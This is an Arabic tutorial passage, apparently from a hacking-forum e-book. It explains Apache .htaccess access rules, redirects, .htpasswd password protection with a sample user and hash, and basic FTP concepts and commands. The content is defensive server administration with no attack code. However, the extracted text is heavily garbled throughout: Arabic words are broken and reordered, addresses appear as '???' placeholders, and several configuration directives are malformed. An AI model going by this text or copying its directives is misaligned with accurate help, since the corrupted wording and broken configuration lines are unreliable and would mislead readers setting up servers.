‫ﻗﻊ ﻻي ﺷﺨ ﺺ‬ ‫ﻗﻊﻟﻤﻦ ﻻﺗ ﺮﯾﺪﻛﻤﺎ ﯾﻤﻜﻨﻚ ﻣﻨﻊ د ﺧﻮ لاﻟﻤﻮ‬ ‫ﺘﻔﺎده ﻣﻦ ذﻟﻚ ﺣﯿﺚ ﯾﻤﻜﻨﻚ ﻣﻨﻊ د ﺧ ﻞاﻟﻤﻮ‬ ‫ﯾﻤﻜﻨﻚاﻻﺳ‬
‫ﻓﻲاﺳ ﺮاﺋﯿ ﻞ ﻣﺜﻼ ‪..‬‬
‫ﺘﺎﻟﻲﻓﻲاﻟﻤﻠ ﻒ ‪- :‬‬ ‫و ﯾﻤﻜﻨﻚ ذﻟﻚ ﻋﻦ ﻃ ﺮﯾ ﻖا ﺿﺎﻓﺔاﻟﺴﻄ ﺮاﻟ‬
‫؟؟؟‪.‬؟؟؟‪.‬؟؟؟‪.‬؟؟؟ ‪deny from‬‬
‫ﺣﯿﺚان ؟؟؟‪.‬؟؟؟‪.‬؟؟؟‪.‬؟؟؟ ﻫﻮاﻻيﺑﻲاﻟﺨﺎ صﺑﻪ ‪.‬‬
‫ﺘﺎﻟﻲ ‪-:‬‬‫ﻗﻊ ﯾﻤﻜﻨﻚا ﺿﺎﻓﺔاﻟﺴﻄ ﺮاﻟ‬ ‫واذاارد ت ﻣﻨﻊايا ﺣﺪ ﻣﻦ د ﺧﻮ لاﻟﻤﻮ‬
‫‪deny from all‬‬
‫ﺘﺎﻟﻲ ‪-:‬‬‫ﻗﻊ ﯾﻤﻜﻨﻚ ذﻟﻚﺑﺎ ﺿﺎﻓﺔاﻟﺴﻄ ﺮاﻟ‬ ‫واذاارد تاﻟﺴﻤﺎ حﻟﺸﺨ ﺺ ﻣﻌﯿﻦﺑﺪ ﺧﻮ لاﻟﻤﻮ‬
‫؟؟؟‪.‬؟؟؟‪.‬؟؟؟‪.‬؟؟؟ ‪allow from‬‬
‫ﺣﯿﺚاﻧﺎ ؟؟؟‪.‬؟؟؟‪.‬؟؟؟‪.‬؟؟؟ﻫﻮاﻻيﺑﻲاﻟﺨﺎ صﺑﻪ‬

‫ﺘﺢﻟﯿﻨﻚﻟﻠﯿﻨﻚا ﺧ ﺮ‬ ‫*ﺗ ﺤﻮﯾ ﻞ ﻣﻦ ﯾ ﺤﺎو لﻓ‬


‫‪-------------------------------------‬‬
‫ﺘﺨﺪم ﻣﺜﻼ ﻋﻨﺪﺗﻐﯿ ﺮ‬ ‫وﺗﺴﻤﻰ ﻫﺬهاﻟﻌﻤﻠﯿﻪ ب ‪ Redirection‬وﻫﻲ ﻣﻦاﻫﻢﻓﻮاﺋﺪ ‪htaccess.‬اﻟﻤﻠ ﻒﺗﺴ‬
‫ﺘﺢ‬ ‫ﺘﺨﺪاماﻟﻤﻠ ﻒ ‪ htaccess.‬ﻋﻨﺪ ﻣ ﺤﺎوﻟﺔا ﺣﺪﻓ‬ ‫ﻗﻊاﻟﻰ ﻣﻜﺎن ﺟﺪﯾﺪﻓﯿﻤﻜﻨﻚﺑﺎﺳ‬ ‫ﻗﻊ ﻣﻠ ﻒﻗﺪﯾﻢ ﻋﻠﻰاﻟﻤﻮ‬ ‫ﻣﻮ‬
‫ﺘﺎﻟﻲﻓﻲاﻟﻤﻠ ﻒ ‪-:‬‬ ‫ا ﺣﺪاﻟﯿﻨﻚاﻟﻘﺪﯾﻢﺗﻮﺟﯿﻬﻪاﻟﻰاﻟﯿﻨﻚاﻟﺠﺪﯾﺪ ﻋﻦ ﻃ ﺮﯾ ﻖا ﺿﺎﻓﺔاﻟﺴﻄ ﺮاﻟ‬
‫؟؟؟‪.‬؟؟؟‪Redirect /somewhere/???.??? /‬‬
‫‪http://www.site.com/newlocation‬‬
‫ﺑ ﺤﯿﺚ ﯾﻜﻮن ‪/somewhere/‬؟؟؟‪.‬؟؟؟ ﻫﻮ ﻣﻜﺎناﻟﻤﻠ ﻒاﻟﻘﺪﯾﻢ و‬
‫‪/http://www.site.com/newlocation‬؟؟؟‪.‬؟؟؟ ﻫﻮ ﻣﻜﺎﻧﺎﻟﻤﻠ ﻒاﻟﺠﺪﯾﺪ‪.‬‬
‫‪----------‬‬

‫* ﻋﻤ ﻞاﻟﻤﻠ ﻒ ‪.htpasswd‬‬
‫‪------------------------‬‬
‫ﺘﺨﺪاماﻟﻤﻠ ﻒ ‪.‬‬ ‫ﺘﻰ ﻧﺴﻄﯿﻊاﺳ‬‫وﯾﻤﻜﻨﻚأنﺗﻘﻮمﺑﻌﻤﻠﻪﺑﻨﻔ ﺲ ﻃ ﺮﯾﻘﺔاﻟﻤﻠ ﻒ ‪ ، htaccess.‬و ﺳﻮ ف ﻧﻌﻤﻠﻪ ﺣ‬
‫ﺘﺐﻓﻲاﻟﻤﻠ ﻒ ‪ htpasswd‬ﻣﺎ ﯾﺄﺗﻲ ‪-:‬‬ ‫‪ htaccess‬ﻓﻲاﻟ ﺤﻤﺎﯾﺔ و ﺳﻮ ف ﻧﻜ‬
‫‪user1:EncryptedPwd1‬‬
‫‪user2:EncryptedPwd2‬‬
‫ﺘﺨﺪم ‪.‬‬‫‪ o‬ﺣﯿﺚان ‪ user1 , user2‬ﻫﻮاﺳﻢاﻟﻤﺴ‬
‫‪ o‬و ‪ EncryptedPwd1 , EncryptedPwd2‬ﻫﻲﻛﻠﻤﺎ تاﻟﺴ ﺮ وﻟﻜﻦ ﻣﺸﻔ ﺮه و ﯾﻤﻜﻨﻚﺗﺸﻔﯿ ﺮاي‬
‫ﻗﻊ‬ ‫ﻛﻠﻤﺔﺗ ﺮﯾﺪﻫﺎ ﻋﻦ ﻃ ﺮﯾ ﻖاﻟﻤﻮ‬
‫‪http://www.euronet.nl/~arnow/htpasswd‬‬
‫او ‪http://www.e2.u-net.com/htaccess/make.htm‬‬
‫ﻓﻤﺜﻼﻟﻮاردﻧﺎ و ﺿﻊ ﯾﻮﺳ ﺮﺑﺎﺳﻢ ‪ Security‬وﻛﻠﻤﺔاﻟﺴ ﺮاﻟﺨﺎ ﺻﺔﺑﻪ ﻫﻲ ‪ fu93hds3‬ﻧﺬﻫﺐاوﻻاﻟﻰ‬
‫ﻗﻊ ‪http://www.euronet.nl/~arnow/htpasswd‬‬ ‫اﻟﻤﻮ‬
‫‪ o‬و ‪username : Security‬‬
‫‪ o‬و ‪passwrod & re-enter password : fu93hds3‬‬
‫ﺘﯿﺠﻪ ‪Security:893bNicBcwszw <--‬‬ ‫ﺘﻈﻬ ﺮاﻟﻨ‬ ‫‪ o‬و ﻧ ﻀﻐﻂ ﻋﻠﻰاﻟﺰر ‪claculate‬ﻟ‬
‫ﺘﺨﺪاماﻟﻤﻠ ﻒ ‪.‬‬
‫ﺘﻄﯿﻊاﺳ‬ ‫واﻻنﻗﺪاﺗﻤﻤﻨﺎ ﻋﻤ ﻞاﻟﻤﻠ ﻒ ‪ htaccess.‬واﻟﺬيﻗﻤﻨﺎﺑﻌﻤﻠﻪ و ذﻟﻚﻟﻜﻲ ﻧﺴ‬
‫‪htaccess‬ﻟﻠ ﺤﻤﺎﯾﺔﺑﻜﻠﻤﺔ ﺳ ﺮ و ﯾﻮﺳ ﺮ ‪.‬‬

‫‪٢٠‬‬
‫‪hi_HaCkEr & MaXhAk2000‬‬ ‫‪Sites UnDeR UtTaCk‬‬ ‫‪www.3asfh.com/vb‬‬

‫*اﻟ ﺤﻤﺎﯾﺔﺑﻮاﺳﻄﻪ ‪htaccess.‬‬


‫‪----------------------------‬‬
‫ﻗﻊاﻻاذاﻛﺎن ﻣﻌﻪ‬ ‫ﺘﺒ ﺮاﻟﻔﺎﺋﺪةاﻟ ﺮﺋﯿﺴﯿﺔﻟﻠﻤﻠ ﻒ ﺣﯿﺚاﻧﻪ ﯾﻤﻜﻦ ﻣﻨﻊايا ﺣﺪ ﻣﻦ د ﺧﻮ ل دﻟﯿ ﻞ ﻣﻌﯿﻦﻓﻲاﻟﻤﻮ‬ ‫وﺗﻌ‬
‫ﺘﺪى ﺧﺎ صاواي ﺷﺊﺗ ﺮﯾﺪ‪.‬‬ ‫ﻛﻠﻤﺔاﻟﺴ ﺮ واﻟﯿﻮﺳ ﺮ ﻧﯿﻢ ‪،‬ﻓﯿﻤﻜﻨﻚ ﻋﻦ ﻃ ﺮﯾﻘﻬﺎ ﻋﻤ ﻞ ﻣﻨ‬
‫ﺘﻪ ﺳﻮ ف‬‫ﻓﻌﻨﺪ و ﺿﻊاﻟﻤﻠ ﻒ ‪htaccess.‬ﻓﻲاي دﻟﯿ ﻞ و ﺣﺎو لا ﺣﺪ د ﺧﻮ ل ﻫﺬااﻟﺪﻟﯿ ﻞاواي ﺟﺰ ء ﯾﻨﺪرجﺗ ﺤ‬
‫ﯾﻄﻠﺐ ﻣﻨﻪ ﻛﻠﻤﺔ ﺳ ﺮ و ﯾﻮﺳ ﺮ ‪.‬‬
‫ﺘﻪ ‪--:‬‬‫و ﯾﻤﻜﻨﻚ ﻋﻤ ﻞ ذﻟﻚ ﻋﻦ ﻃ ﺮﯾ ﻖا ﺿﺎﻓﺔ ﻣﺎ ﯾﺄﺗﻲﻓﻲاﻟﻤﻠ ﻒﻗﺒ ﻞ ﻧﺴﺨﻪﻓﻲاﻟﺪﻟﯿ ﻞاﻟﻤ ﺮاد ﺣﻤﺎﯾ‬
‫‪AuthUserFile‬‬
‫‪/somewhere/.htpasswd‬‬
‫" ‪AuthName "Enter your user and passed‬‬
‫‪please‬‬
‫‪user-Require valid‬‬
‫‪AuthType Basic‬‬

‫>‪<Limit GET POST‬‬


‫‪require valid-user‬‬
‫>‪<Limit/‬‬
‫ﻗﻌﻚ‬ ‫‪o‬ﺑ ﺤﯿﺚ ﯾﻜﻮن ‪/somewhere/.htpasswd‬ﻫﻮ ﻣﻜﺎن ﻣﻠ ﻒ ‪ htpasswd.‬ﻋﻠﻰ ﻣﻮ‬
‫ﺘﻄﻠﺐﻛﻠﻤﺔ‬‫ﺘﻲ ﺳﻮ فﺗﻈﻬ ﺮﻟ‬ ‫‪ o‬و ﯾﻜﻮن ‪ Enter your user and passed please‬ﻫﻲاﻟ ﺮﺳﺎﻟﻪاﻟ‬
‫اﻟﺴ ﺮ‬

‫* ﻣﻨﻊاﻇﻬﺎراﻟﻤﻠ ﻒ ‪htaccess.‬‬
‫‪-----------------------------‬‬
‫ﻗﺪ ﻋ ﺮﻓﻨﺎاﻻنانﻟﻬﺬااﻟﻤﻠ ﻒاﻫﻤﯿﻪﻛﺒﯿ ﺮهﻓﯿﺠﺐ ﻋﻠﯿﻨﺎان ﻧ ﺤﻤﯿﻪ ﺟﯿﺪا ‪،‬ﻓﺎﻟﺒ ﺮﻏﻢ ﻣﻦاناﻟﻤﻠ ﻒ ﻣﺨﻔﻲاﻻ‬
‫اﻧﻪ ﻏﯿ ﺮ ﺳﺎﻟﻢ ﻣﻦان ﯾﻜﻮناﻟﺴ ﺮﻓ ﺮ ﻧﻔﺴﻪ ﻏﯿ ﺮ ﻣﺆﻣﻦاواﻧﻪﻫﻨﺎكﺗﺼ ﺮﯾﺢ ﺧﻄﺄ ‪..‬‬
‫ﻟﺬﻟﻚ ﺳﻮ ف ﻧﻤﻨﻊ ﻋ ﺮ ض ﻫﺬااﻟﻤﻠ ﻒ ﻋﻦ ﻃ ﺮﯾ ﻖا ﺿﺎﻓﺔ ﻣﺎ ﯾﺄﺗﻲ ‪- :‬‬
‫>‪<Files .htaccess‬‬
‫‪order allow,deny‬‬

‫‪deny from all‬‬


‫>‪<Files/‬‬
‫ﻓﺎذا ﺣﺎو لا ﺣﺪ ﻋ ﺮ ضاﻟﻤﻠ ﻒ ﺳﻮ ف ﯾﻈﻬ ﺮﻟﻪ ‪. error 403‬‬

‫ﺘﺪادا ﺧ ﺮ‬‫* ﺟﻌ ﻞاﻟﺼﻔ ﺤﺎ تﺗﻈﻬ ﺮﺑﺎﻣ‬


‫‪-------------------------------‬‬
‫ﺘﺪاد ‪ txt.‬ﻣﺜﻼ ‪.‬‬
‫ﺘﺪاده ‪ html.‬وﻟﻜﻨﻪ ذواﻣ‬ ‫ﺘﺨﺪام ﻫﺬهاﻟﺨﺎ ﺻﯿﺔ ﻋﻤ ﻞ ﻣﻠ ﻒ ﯾﻈﻬ ﺮﻛﺄناﻣ‬ ‫وﯾﻤﻜﻦﺑﺎﺳ‬
‫ﺘﺎﻟﻲ ‪-:‬‬‫ﺑﺎ ﺿﺎ فاﻟﺴﻄ ﺮاﻟ‬
‫‪AddType text/plain html‬‬
‫ﺘﻲ ﯾﻤﻜﻨﻚ ﻋﻤﻠﻬﺎﻓﻲ ﻫﺬااﻟﻤﻠ ﻒ ‪-:‬‬ ‫ﺘﻐﯿ ﺮا تاﻟ‬‫وﯾﻤﻜﻨﻚ رؤﯾﺔﻛﺎﻓﺔاﻟ‬
‫‪http://www .pharaonics.net/books/MIME.txt‬‬
‫‪...‬‬

‫‪٢١‬‬
‫‪hi_HaCkEr & MaXhAk2000‬‬ ‫‪Sites UnDeR UtTaCk‬‬ ‫‪www.3asfh.com/vb‬‬

‫‪" FTP‬‬ ‫" ﻧﻈﺎم ﻧﻘﻞ اﳌﻠﻔﺎت‬

‫‪$$$$$$$$$‬‬
‫اﻟﻜﺎﺗﺐ‪:‬اﻟﺠﻮﻛ ﺮ‬
‫‪$$$$$$$$$‬‬
‫‪..........‬‬

‫ﻣﺎ ﻫﻮ ﻧﻘ ﻞاﻟﻤﻠﻔﺎ ت ‪ FTP‬؟‬

‫ﺘﺼﺎرﻟﻜﻠﻤﺔ ‪ File Transfer Protocol‬ﻮﺗﻌﻨﻲﺑ ﺮوﺗﻮﻛﻮ ل ﻧﻘ ﻞ ﺎﻟﻤﻠﻔﺎ ت‪ ،‬وﻫﺬهاﻟﺨﺪﻣﺔﻫﻲ‬ ‫‪FTP‬ﻫﻲا ﺧ‬


‫ﺘﻲﺗﺠﻌ ﻞ ﻣﻦاﻟﻤﻤﻜﻦ ﻧﻘ ﻞاﻟﻤﻠﻔﺎ تﺑﯿﻦ ﺎﻟﻜﻤﺒﯿﻮﺗ ﺮا ت ﻋﻠﻰاﻟﺸﺒﻜﺔ وﻣﻦ ﻣﯿﺰا ت‬ ‫ا ﺣﺪىﺗﺴﻬﯿﻼ ت ‪ TCP/IP‬ﺎﻟ‬
‫ﺘﻮي ﻧﻈﻢ‬ ‫ﺘ ﺮﺟﻤﺔ ﺷﻜ ﻞاﻟﻤﻠﻔﺎ تاﻟﻨﺼﯿﺔﺑﻄ ﺮﯾﻘﺔأﺗﻮﻣﺎﺗﯿﻜﯿﺔ ﺣﯿﺚأناﻟﻜﻤﺒﯿﻮﺗ ﺮا تﺗ ﺤ‬ ‫‪FTP‬ﺎﻟ ﺮاﺋﻌﺔأﻧﻬﺎﺗﻘﻮمﺑ‬
‫ﺘ ﺮﺟﻤﺔ وﻫﻮ ﻣﺎﺗﻘﻮم‬ ‫ﺘﺎجﻟ‬ ‫ﺘﺎﻟﻲﺗ ﺤ‬ ‫ﺘﻠﻔﺔﻟﻠﻤﻠﻔﺎ تاﻟﻨﺼﯿﺔﻓﺒﺎﻟ‬‫ﺘﻠﻔﺔ وﻋﻠﯿﻪﻓﻠﺪﯾﻬﺎأﺷﻜﺎ ل ‪ Formats‬ﻣﺨ‬ ‫ﺗﺸﻐﯿ ﻞ ﻣﺨ‬
‫ًﻓﻲأﻣﯿ ﺮﻛﺎاﻟﻰ ﺟﻬﺎزﻧﺎ ‪.‬‬ ‫ﺘﺎجﻟﺒ ﻀﻊ ﻧﻘ ﺮا ت ﻋﻠﻰاﻟﻔﺄرةﻛﻲ ﻧﻨﻘ ﻞ ﻣﻠﻔﺎ‬
‫ﺑﻪ ‪ FTP,‬ﻮﺑﺨﺪﻣﺔ ﻧﻘ ﻞاﻟﻤﻠﻔﺎ تﻓﺎﻧﻨﺎ ﻧ ﺤ‬

‫ﻗﺴﺎم ﻧﻘ ﻞاﻟﻤﻠﻔﺎ ت‪:‬‬


‫ﺄ‬

‫ﻧﻘ ﻞاﻟﻤﻠﻔﺎ ت ﯾﻨﻘﺴﻢاﻟﻰﻗﺴﻤﯿﻦ‪:‬‬


‫ﺗﻨﺰﯾ ﻞاﻟﻤﻠﻔﺎ ت‪Download:‬‬
‫ﻮﻫﻮ ﺟﻠﺐاﻟﻤﻠﻔﺎ ت ﻣﻦاﻟﻜﻤﺒﯿﻮﺗ ﺮاﻟﻤ ﻀﯿ ﻒ ‪ Host‬ﺎﻟﻰاﻟﺠﻬﺎزاﻟﻤ ﺤﻠﻲ‪Local.‬‬
‫ﺎرﺳﺎ لاﻟﻤﻠﻔﺎ ت‪Uplaod:‬‬
‫ﻮﻫﻮارﺳﺎ لاﻟﻤﻠﻔﺎ ت ﻣﻦاﻟﻜﻤﺒﯿﻮﺗ ﺮاﻟﻤ ﺤﻠﻲ ‪ Local‬ﺎﻟﻰاﻟﻜﻤﺒﯿﻮﺗ ﺮاﻟﻤ ﻀﯿ ﻒ‪Host.‬‬
‫ﻮﻣﻦاﻟﻨﺎ ﺣﯿﺔاﻷﻣﻨﯿﺔﻓﻬﻨﺎك ﻧﻮﻋﺎنﻟﻨﻘ ﻞ ﺎﻟﻤﻠﻔﺎ ت‪:‬‬
‫ﻧﻘ ﻞ ﻣﺆﻣﻦ‪Secure FTP:‬‬
‫ﺘﺨﺪم وﻛﻠﻤﺔ ﻣ ﺮورﻟﻠﺪ ﺧﻮ لاﻟﻰاﻟﻨﻈﺎم وﺗ ﺤﺼ ﻞ ﻋﻠﯿﻪ ﻣﻦ ﻣﺪﯾ ﺮاﻟﻨﻈﺎماﻟﻤ ﻀﯿ ﻒ‪.‬‬ ‫ﺘﺎجاﻟﻰاﺳﻢ ﻣﺴ‬ ‫ﺗﺤ‬
‫ﻧﻘ ﻞ ﻣﺠﻬﻮ ل‪Anonymous FTP:‬‬
‫ﺘﺨﺪام ‪guest‬ﺄو ‪anonymous‬‬ ‫ًاﺳ‬‫ﺘﻄﯿﻊ ﻏﺎﻟﺒﺎ‬ ‫ﺘﺨﺪم وﻛﻠﻤﺔ ﻣ ﺮورﻟﻠﺪ ﺧﻮ ل وﺗﺴ‬ ‫ﺘﺎجاﻟﻰاﺳﻢ ﻣﺴ‬ ‫ﻻﺗ ﺤ‬
‫ً ﻋﻨﻬﻤﺎ‪.‬‬‫ﻋﻮ ﺿﺎ‬
‫ﻗﺴﺎم‪:‬‬ ‫ﺛﺔﺄ‬ ‫ﺘ ﺮﻧ ﺖاﻟﻰﺛﻼ‬ ‫ﺗﺼﻨ ﻒ ﻣﺼﺎدراﻟﺒ ﺮاﻣ ﺞ ﻋﻠﻰاﻻﻧ‬
‫ﻣﻠﻜﯿﺔ ﻋﺎﻣﺔ‪Public Domain:‬‬
‫ﺘﺨﺪاﻣﻬﺎ وﺗﻮزﯾﻌﻬﺎ‬‫ﺘﺨﺪاماﻟﻌﺎمﻓﻠﯿ ﺲ ﻫﻨﺎك ﺣﻘﻮ ق ﻣﻠﻜﯿﺔﻷ ﺣﺪ وﻻﻗﯿﻮد ﻋﻠﻰاﺳ‬ ‫ﻮ ﺿﻌ ﺖاﻟﺒ ﺮاﻣ ﺞ ﻫﻨﺎﻟﻼﺳ‬
‫وﺗﻌﺪﯾﻠﻬﺎ‪.‬‬
‫ﻣﺼﺎدر ﻣﺠﺎﻧﯿﺔ‪Freeware:‬‬
‫ﺘﺨﺪام ﻫﺬهاﻟﺒ ﺮاﻣ ﺞأوﺗﻮزﯾﻌﻬﺎ وﻟﻜﻦ ﻫﻨﺎك ﺣﻘﻮ ق ﻣﻠﻜﯿﺔ وﻧﺸ ﺮ وﻻ ﯾﺠﻮزﺗﻌﺪﯾﻠﻬﺎأوﺑﯿﻌﻬﺎ‪.‬‬ ‫ﯾ ﺤ ﻖﻟﻠﺠﻤﯿﻊاﺳ‬
‫ﺘ ﺮﻛﺔ‪Shareware:‬‬ ‫ﻣﺼﺎدر ﻣﺸ‬
‫ﺘ ﻀﻤﻦ ﺟﻤﯿﻊاﻟﻤﻤﯿﺰا ت وﯾﺠﺐﺗ ﺤﻄﯿﻢ ﺎﻟﻨﺴ ﺦﺑﻌﺪ‬ ‫ﻗﺪ ﻻﺗ‬‫ﺘﺠ ﺮﺑﺔﻗﺒ ﻞاﻟﺸ ﺮا ء و‬ ‫ﺘﻢﺗﻮزﯾﻊﻫﺬهاﻟﺒ ﺮاﻣ ﺞﺑﻐ ﺮ ضاﻟ‬ ‫ﯾ‬
‫ﺘﻬﺎ ء ﻣﺪﺗﻬﺎ‪.‬‬ ‫اﻧ‬

‫‪FTP‬ﻮ ﺎﻟﻔﯿ ﺮوﺳﺎ ت ‪:‬‬

‫ﯾﺠﺐأنﺗﻌﻠﻢﻓﻲاﻟﺒﺪاﯾﺔأن ﺎﻟﻤﻠﻔﺎ ت واﻟﺒ ﺮاﻣ ﺞﺗﻨﻘﺴﻢاﻟﻰﻗﺴﻤﯿﻦ‬


‫‪ASCII:‬‬

‫‪٢٢‬‬
‫‪hi_HaCkEr & MaXhAk2000‬‬ ‫‪Sites UnDeR UtTaCk‬‬ ‫‪www.3asfh.com/vb‬‬

‫ـ )‪(American Standard Code for Information Interchange‬ﻮاﻟﻤﻠﻔﺎ ت ﻣﻦ‬ ‫ًﻟ‬


‫ﺘﺼﺎرا‬ ‫ﺎﺧ‬
‫ﺘﺨﺪم ﻫﺬااﻟﻤﺼﻄﻠﺢ‬ ‫ﺘﻬﺎﺑﯿﻦاﻟﺼﻔ ﺮ و ‪ .١٢٧‬وﯾﺴ‬ ‫ﺘ ﺮاو حﻗﯿﻤ‬ ‫ﺘﻮي ﻋﻠﻰ ﺳﺒﻌﺔ ﺟﺰﯾﺌﺎ ت ‪bits‬ﺗ‬ ‫ﻫﺬااﻟﻨﻮ عﺗ ﺤ‬
‫ﺘﺨﺪماﻟﻤﻠﻔﺎ تاﻟﻨﺼﯿﺔﻫﺬااﻟﻨﻮ ع‬ ‫ﻗﺎمﻓﻲاﻟﻜﻤﺒﯿﻮﺗ ﺮ‪ .‬وﺗﺴ‬ ‫ﺘ ﺤﻮﯾ ﻞاﻷ ﺣ ﺮ فاﻟﻰأر‬ ‫ﺘﻌﺒﯿ ﺮ ﻋﻦ ﺎﻟﻤﻌﯿﺎراﻟﺬي ﯾﻘﻮمﺑ‬ ‫ﻟﻠ‬
‫ﻣﻦاﻟﺼﯿﻎ‪.‬‬
‫‪Binary:‬‬
‫ﺘ ﺮاو حﺑﯿﻦاﻟﺼﻔ ﺮ و ‪ ٢٥٥‬وﺗﻨﺪرج‬ ‫ﺘﻮي ﻋﻠﻰﺛﻤﺎﻧﯿﺔ ﺟﺰﯾﺌﺎ ت ‪bits‬ﺗ‬ ‫ﻮﺗﻌﻨﻲاﻟﻤﻠﻔﺎ ت ذا تاﻟﻨﻈﺎماﻟﺜﻨﺎﺋﻲ ﻮﺗ ﺤ‬
‫اﻟﺼﻮر واﻟﺒ ﺮاﻣ ﺞ ﻮاﻟﻤﻠﻔﺎ تاﻟﻤ ﻀﻐﻮ ﻃﺔﺗ ﺤ ﺖ ﻫﺬااﻟﻨﻮ ع‪.‬‬
‫ﺘﻘ ﻞ ﻋﺒ ﺮاﻟﺼﻮرﻛﺼﯿﻎ & ‪jpg & gif‬‬ ‫ﺘﻘ ﻞ ﻋﺒ ﺮ ﻣﻠﻔﺎ ت ‪ASCII‬ﻛﻤﺎﻻﯾﻤﻜﻦأنﺗﻨ‬ ‫ﻮاﻟﻔﯿ ﺮوﺳﺎ تﻻ ﯾﻤﻜﻦأنﺗﻨ‬
‫ﺘﺪادا تاﻟﺼﻮر وﻻ ﻋﺒ ﺮ ﻣﻠﻔﺎ تاﻟﻔﯿﺪﯾﻮ واﻟﺼﻮ ت ﻣﺜ ﻞ ‪avi - ram - mpg - mp3 -‬‬ ‫‪bmp‬ﻮﻏﯿ ﺮﻫﺎ ﻣﻦ ﺎﻣ‬
‫ﺘﺸﻐﯿ ﻞ واﻟﺒ ﺮاﻣ ﺞ ﺎﻟﻤ ﻀﻐﻮ ﻃﺔ وﻋﺎدة‬‫ﺘﻘ ﻞ ﻋﺒ ﺮاﻟﺒ ﺮاﻣ ﺞ وﻣﻠﻔﺎ تاﻟﻨﻈﺎم واﻟ‬‫‪wav‬وﻏﯿ ﺮﻫﺎ‪ ،‬وﺑﻤﻌﻨﻰ آ ﺧ ﺮﻓﺎﻧﻬﺎﺗﻨ‬
‫ﻣﺎﺗﻜﻮن ‪: exe - com - bat - dll - drv - sys - bin - ovl - zip - mim - uue - xxe -‬‬
‫ﺘﻘ ﻞﻓﯿ ﺮوﺳﺎ تاﻟﻤﺎﻛ ﺮو ﻋﺒ ﺮﺗﻄﺒﯿﻘﺎ ت ‪MS Office،‬ﻟﺬﻟﻚا ﺣﺬر ﻣﻦﻫﺬه‬ ‫‪b64 - bhx،‬ﻛﻤﺎ ﯾﻤﻜﻦأنﺗﻨ‬
‫ًﻗﺒ ﻞﺗﺸﻐﯿﻠﻬﺎ‪.‬‬‫اﻟﻤﻠﻔﺎ ت واﻓ ﺤﺼﻬﺎ داﺋﻤﺎ‬

‫ﻃ ﺮﯾﻘﺔ ﻧﻘ ﻞاﻟﻤﻠﻔﺎ ت ‪FTP :‬‬

‫ﻫﻨﺎك ﻃ ﺮ ق ﻋﺪﯾﺪةﻟﻨﻘ ﻞاﻟﻤﻠﻔﺎ ت ﻮﻫﻲ‪:‬‬

‫ﺘﺨﺪام ﻧﻈﺎم‪UNIX‬‬
‫ﻧﻘ ﻞاﻟﻤﻠﻔﺎ تﺑﺎﺳ‬

‫ﺘﺨﺪامﺄواﻣ ﺮ وﻫﺎﻫﻨﺎﺑﻌ ﺾأواﻣ ﺮ‪UNIX:‬‬ ‫ﺘﻄﻠﺐﻫﺬهاﻟﻌﻤﻠﯿﺔ ﻋﺎدةاﺳ‬ ‫ﺗ‬


‫‪ascii:‬ﻟﻨﻘ ﻞ ﻣﻠﻔﺎ ت ‪ ASCII‬ﺎﻟﻨﺼﯿﺔ‪ ،‬وﻋﻨﺪﺗﻐﯿﯿ ﺮ ﻫﺬااﻟﻮ ﺿﻊﺛﻢاﻟ ﺤﺎﺟﺔﻟﻨﻘ ﻞ ﻣﻠﻔﺎ ت ﻣﻦ ﻫﺬااﻟﻨﻮ عﻓﯿﺠﺐ‬
‫اﻋﺎدةاﻷﻣ ﺮ‪.‬‬
‫‪binary:‬ﻟﻨﻘ ﻞاﻟﻤﻠﻔﺎ تاﻟﺜﻨﺎﺋﯿﺔ‪ ،‬وﻋﻨﺪﺗﻐﯿﯿ ﺮ ﻫﺬااﻟﻮ ﺿﻊﺛﻢاﻟ ﺤﺎﺟﺔﻟﻨﻘ ﻞ ﻣﻠﻔﺎ ت ﻣﻦ ﻫﺬااﻟﻨﻮ عﻓﯿﺠﺐاﻋﺎدة‬
‫اﻷﻣ ﺮ‪.‬‬
‫‪status:‬ﻟﻔ ﺤ ﺺاﻟﻤﻠ ﻒ وﻣﻌ ﺮﻓﺔ ﻫ ﻞ ﻫﻮ ﻣﻦ ﻧﻮ ع ‪ASCII‬ﺄو‪Binary.‬‬
‫‪help:‬ﻟﻌ ﺮ ضﻗﺎﺋﻤﺔﺑﺄواﻣ ﺮ‪UNIX.‬‬
‫ﺘﻮﯾﺎ تاﻟﺪﻟﯿ ﻞ‬‫‪dir:‬ﻋ ﺮ ض ﻣ ﺤ‬
‫ﺘﻮﯾﺎ تاﻟﺪﻟﯿ ﻞاﻟ ﺤﺎﻟﻲ‪.‬‬ ‫‪ls:‬ﻋ ﺮ ض ﻣ ﺤ‬
‫‪cd directory:‬ﺗﻐﯿﯿ ﺮ ﺎﻟﺪﻟﯿ ﻞ‪.‬‬
‫‪get filename:‬ﺟﻠﺐاﻟﻤﻠ ﻒاﻟﻤﻄﻠﻮب واﻧﺰاﻟﻪ ﻋﻠﻰ ﺟﻬﺎزك‪.‬‬
‫‪mget filename:‬ﺟﻠﺐ ﻣﺠﻤﻮﻋﺔ ﻣﻦاﻟﻤﻠﻔﺎ ت‪.‬‬
‫‪ pwd:‬ﻃﺒﺎﻋﺔاﻟﺪﻟﯿ ﻞاﻟ ﺤﺎﻟﻲ‪.‬‬
‫‪bye:‬ﺎﻧﻬﺎ ءاﻻرﺗﺒﺎط واﻟﺨ ﺮوج ﻣﻦاﻟﻨﻈﺎماﻟﺒﻌﯿﺪ‪.‬‬

‫ﺘﺨﺪام ﺣﺴﺎب‪Shell:‬‬
‫ﻧﻘ ﻞاﻟﻤﻠﻔﺎ تﺑﺎﺳ‬

‫ً ﺳﻮ فﺗﺪ ﺧ ﻞ‬ ‫أو ل ﻣﺎﺗﻔﻌﻠﻪﻓﻲﻫﺬااﻟﻨﻮ ع ﻣﻦ ﻧﻘ ﻞاﻟﻤﻠﻔﺎ تﻫﻮاد ﺧﺎ لاﻟﻤﻠﻘﻦاﻟﺨﺎ صﺑﺸ ﺮﻛﺔﺗﻮﻓﯿ ﺮاﻟﺨﺪﻣﺔﻓﻤﺜﻼ‬


‫ًﺑﺎﻟﻮﺟﻬﺔاﻟﻤ ﺮادةﻓﯿﺼﺒﺢ ‪:‬‬ ‫ﺘﺒﻮﻋﺎ‬
‫ًاﻷﻣ ﺮ ‪ ftp‬ﻣ‬
‫ﺘﺐﺄوﻻ‬‫ﺣﺴﺎﺑﻚﻓﻲ ‪ Tripod‬ﻋﻦ ﻃ ﺮﯾ ﻖ ‪ Unix Shell،‬ﻧﻜ‬
